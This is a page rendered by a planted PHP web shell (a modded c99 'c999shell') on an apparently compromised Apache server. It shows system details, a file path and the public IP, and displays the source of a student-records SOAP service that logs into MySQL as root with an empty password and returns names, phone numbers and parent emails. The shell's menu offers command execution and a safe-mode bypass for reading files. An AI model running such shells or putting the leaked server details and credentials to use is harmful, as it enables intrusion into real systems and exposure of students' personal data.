Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/webservice/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php require_once('nusoap.php'); function studentbio($studentId) { $host="localhost"; $username="root"; $pass_word=""; $db="reg"; mysql_connect( $host,$username,$pass_word) or die ("ติดต่อกับฐานข้อมูล Mysql ไม่ได้ "); mysql_select_db($db) or die("เลือกฐานข้อมูลไม่ได้"); //$sql = "SELECT * FROM student,faculty,department,branch,rent WHERE (StudentID like '%$studentid%') and (student.bran_code=branch.bran_code) and (student.StudentID=rent.RentID) ORDER BY StudentID,IsreturnAll"; //$sql = "SELECT * FROM StudentMaster WHERE (studentId='492101001')"; //$sql = "SELECT * FROM StudentMaster, StudentBio WHERE (StudentID like '%$studentId%') and (StudentCode =StudentCode) and (StudentMaster.studentId=StudentBio.studentId) ORDER BY studentId"; $sql = "SELECT * FROM StudentMaster WHERE (studentId='492101001')"; $dbquery = mysql_query($sql); $information = '<?xml version="1.0" encoding="UTF-8"?>'; $information .= '<studentbio>'; $StudentID = '1'; while($result= mysql_fetch_array($dbquery)) { //$StudentID = $result["studentId"]; /// if($StudentID!=$BioID){ //$BioID = $result["studentId"]; $information .= '<student>'; $information .= '<code>'; $information .= $result["StudentCode"]; $information .= '</code>'; $information .= '<Name>'; $information .= $result["StudentName"]; $information .= '</Name>'; $information .= '<Surname>'; $information .= $result["StudentSurname"]; $information .= '</Surname>'; $information .= '<phone>'; $information .= $result["HomePhoneNo"]; $information .= '</phone>'; $information .= '<Email>'; $information .= $result["ParentEmail"]; $information .= '</Email>'; $information .= '</student>'; //} $information .= '</studentbio>'; return $information; } $server = new soap_server; $server->configureWSDL('student_bio_wsdl', 'urn:student_bio_wsdl'); $server->register('studentbio', array('studentid' => 'xsd:string'), array('information' => 'xsd:string'), 'http://61.19.29.30/webservice/', 'http://61.19.29.30/webservice/', 'rpc', 'encoded', 'Search_For_Student_Bio'); $HTTP_RAW_POST_DATA = isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : ''; $server->service($HTTP_RAW_POST_DATA); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |